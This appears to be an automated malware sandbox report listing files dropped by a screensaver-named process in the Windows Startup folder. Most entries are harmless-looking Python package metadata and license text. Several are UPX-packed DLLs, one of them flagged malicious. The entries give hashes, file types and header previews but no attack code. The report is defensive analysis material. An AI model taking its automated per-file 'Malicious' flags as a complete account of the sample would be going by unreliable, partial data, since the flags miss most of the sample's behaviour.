                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11358
                                                                                                    Entropy (8bit):4.4267168336581415
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                    MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                    SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                    SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                    SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                    Malicious:false
                                                                                                    Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4648
                                                                                                    Entropy (8bit):5.006900644756252
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                    MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                    SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                    SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                    SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                    Malicious:false
                                                                                                    Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2518
                                                                                                    Entropy (8bit):5.6307766747793275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                    MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                    SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                    SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                    SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                    Malicious:false
                                                                                                    Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):91
                                                                                                    Entropy (8bit):4.687870576189661
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                    MD5:7D09837492494019EA51F4E97823D79F
                                                                                                    SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                    SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                    SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                    Malicious:false
                                                                                                    Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19
                                                                                                    Entropy (8bit):3.536886723742169
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:JSej0EBERG:50o4G
                                                                                                    MD5:A24465F7850BA59507BF86D89165525C
                                                                                                    SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                    SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                    SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                    Malicious:false
                                                                                                    Preview:importlib_metadata.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with very long lines (888)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1335
                                                                                                    Entropy (8bit):4.226823573023539
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                    MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                    SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                    SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                    SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                    Malicious:false
                                                                                                    Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):1.5
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Mn:M
                                                                                                    MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                    SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                    SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                    SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                    Malicious:false
                                                                                                    Preview:pip.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1107
                                                                                                    Entropy (8bit):5.115074330424529
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                    MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                    SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                    SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                    SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                    Malicious:false
                                                                                                    Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:Unicode text, UTF-8 text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2153
                                                                                                    Entropy (8bit):5.088249746074878
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                    MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                    SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                    SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                    SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                    Malicious:false
                                                                                                    Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4557
                                                                                                    Entropy (8bit):5.714200636114494
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                    MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                    SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                    SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                    SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                    Malicious:false
                                                                                                    Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):81
                                                                                                    Entropy (8bit):4.672346887071811
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                    MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                    SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                    SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                    SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                    Malicious:false
                                                                                                    Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):104
                                                                                                    Entropy (8bit):4.271713330022269
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                    MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                    SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                    SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                    SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                    Malicious:false
                                                                                                    Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):660248
                                                                                                    Entropy (8bit):7.993275451327471
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:ajFc9XUn2iq3Z7tTogf3AKuApDVPXyHaDRtIRqMo4UE0AzcNzeMbziw:/98qt37rXy6N60MolE0scNrp
                                                                                                    MD5:132614956F138F3594D1053E3FAC4779
                                                                                                    SHA1:95115F866A87DB308FF00AF0273E04E31A3FDAAE
                                                                                                    SHA-256:2A4AE8CA681FA6F8DE3B6DBCC3D32652EA3AB3EE7E2BE80B7AFF822A382CA8FF
                                                                                                    SHA-512:5B12B51C78BD72F410E2F53C086322557591D9D66B6D473264FA731763EC2317470009C13CBB9D0985C9006C7F62C4EED14C263295BD7EF11DB0BC492C2CA5A0
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tB..,...,...,..m....,.D.-...,.D./...,.D.(...,.D.)...,..m-...,...-...,...$...,...,...,......,.......,.Rich..,.........PE..d......f.........." ...(.....0............................................................`..............................................#.......................................................................... ...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):303384
                                                                                                    Entropy (8bit):7.985321682544261
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:7uQ0qZzMWlZe6+dTxmH1wne4P7dK5H4lT3yfd6o0VSi2Erk8BnJ1Ah:7uQ0wAWlc6+dg1wb7/82UUrk8BnJ1Ah
                                                                                                    MD5:3D5CB46D212DA9843D199F6989B37CD5
                                                                                                    SHA1:CE5E427D49EA1ADBA9C941140F3502C969B6819E
                                                                                                    SHA-256:50A55BC145B1F43E5125EF0B09E508946221D02D5FEA1B7550A43D8C8C41C970
                                                                                                    SHA-512:C52014C96578DB4C7F97878A13CA8C2A4574CC6671689BB554382AD0E593EB87FAC55961C7C11EF82B04627FB851AC44848BAC9EC91FCA0AFAA965E4F1F24AA5
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d....f.........." ...(.`....... .......0................................................`.............................................X....................@..........................................................@...........................................UPX0..... ..............................UPX1.....`...0...`..................@....rsrc................d..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53248
                                                                                                    Entropy (8bit):7.721350654489589
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:27XSI/nbfB1uNCvj6+wTKq3+fud5uGbl3eEbxVRIMAyGmmIPwDUHuzup/IaMZI9t:2OIbB8ij6+ul+2+sOU2MdwQOKIa
                                                                                                    MD5:2EFE8000A13C0710D776999440F3B47D
                                                                                                    SHA1:7D1418CE2693A44AEE3B49DAD5AFFF3133E3EF67
                                                                                                    SHA-256:9B5FB1B4E1ACF363CB7E4784A64B330A9894AA0D092BAEF932FC5C1CE2E5D095
                                                                                                    SHA-512:1049D61FFB3761348DEBB882B38D2851B7DAC1344268DFD1670876D335C170767D7997EA52DFA37B2F3105C4C8A0840DA725D9BA718DB9A337C919988ABA0F28
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Mi...............pr.....[}......[}......[}......[}.......}......A.......Bp...............}.......}.......}......Rich....................PE..d......g.........." .........0.......Y....................................................`.........................................hv......hs.......p..h...................$........................................e..8...........................................UPX0....................................UPX1................................@....rsrc....0...p...$..................@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19456
                                                                                                    Entropy (8bit):7.269415958239344
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yLcGw1KILc8deyxLX5MAk3tHzmMZ+ZpBSTwI771208wGaNhrQZa7gJXcHaKh:S38Lz1lk38MZVV7p20zv8pMHa
                                                                                                    MD5:6254589B12D09495AECB5D2FBEBFBCB6
                                                                                                    SHA1:80C1144EFA85AC367ECFE3CF213F19CE1D0EA8C8
                                                                                                    SHA-256:836BE7E08B3F667AF9F5BA03ACEF2AD3FC62260283F917554E7B62BE05BDA6D7
                                                                                                    SHA-512:19DA23E8D5F496DF86F66226D34D2605956F63F4CEE1E4CD5ADBE974042DBB45CFE98C02EEDA1818C5D6EA52B4C6E63B2DDC97B154E623E003BAA83F12402EC4
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6/5drN[7rN[7rN[7{6.7tN[7 ;Z6vN[796Z6pN[7 ;^6~N[7 ;_6zN[7 ;X6qN[7.;Z6pN[7:.Z6qN[7rNZ7*N[7.;R6sN[7.;[6sN[7.;Y6sN[7RichrN[7................PE..d......g.........." .....@................................................................`.............................................P...`...........`...................8...........................................8...........................................UPX0....................................UPX1.....@.......@..................@....rsrc................D..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):202240
                                                                                                    Entropy (8bit):7.986154952173355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:sL+HY0DZ1geohGKKEfYWE/WPKUjwvk0ozMyHLBHNOUOyGOQsWU72aENk0Ex2fWm0:s6YcbgH8KKEzlKUjwv8prFNPJ7x2Om
                                                                                                    MD5:ACFAD2025CB407E7D7D784E09AA078E6
                                                                                                    SHA1:7D09BA0CF55FA1902F605D12B639152AA60F2C42
                                                                                                    SHA-256:9C29898AED093A5AA939F21D3F715573DA6E67BE05ACEE9DD28457BACB90AB94
                                                                                                    SHA-512:81BBF89367EE5C5EB021206D0C9ECB2037FDDC7DBD38C497CF565AE7671E068D02822781DD05D57202D341083CA9F3B0B4A84DE643960C0D19B10C8C1DE7102D
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F...........1....r....I......r.....r.....r.....u......J..u.....u.....u]....u....Rich..........PE..d...j'.f.........." ...(.........@...N...P...................................p............`.........................................lc..\....`..|....`...........3...........c.......................................Z..@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:modified
                                                                                                    Size (bytes):171008
                                                                                                    Entropy (8bit):7.983795993228766
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:FXrrMDITptr9HlsXchNBn3PHEwsMq31yJG9l8ffO4wOgTjwFczW:FFp19FsXchXEwsMiys9lG9wFWO
                                                                                                    MD5:2F12DA584A362BAD45C6B9B3DDD2445C
                                                                                                    SHA1:86ADC05435A9A7DC0B0C676456B15F64D7DF6F44
                                                                                                    SHA-256:DA95D86762FB4EA6A479990E1B91591CCAD7D0F88072A7805052CD71168DB115
                                                                                                    SHA-512:6113292936EA39C45764C240E04A92479403EF6C64AA959922E94F990F8D405299793ACBDEB8A4C924D81857E12B3D83E7C8C93C261E8101F4EEE44AB77DC92E
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................k...........k.....k.....k.....l......T..l.....l.....ln....l....Rich..................PE..d...d'.f.........." ...(.............E.......................................p............`......................................... c..d....`..0....`...........)...........c.......................................Q..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
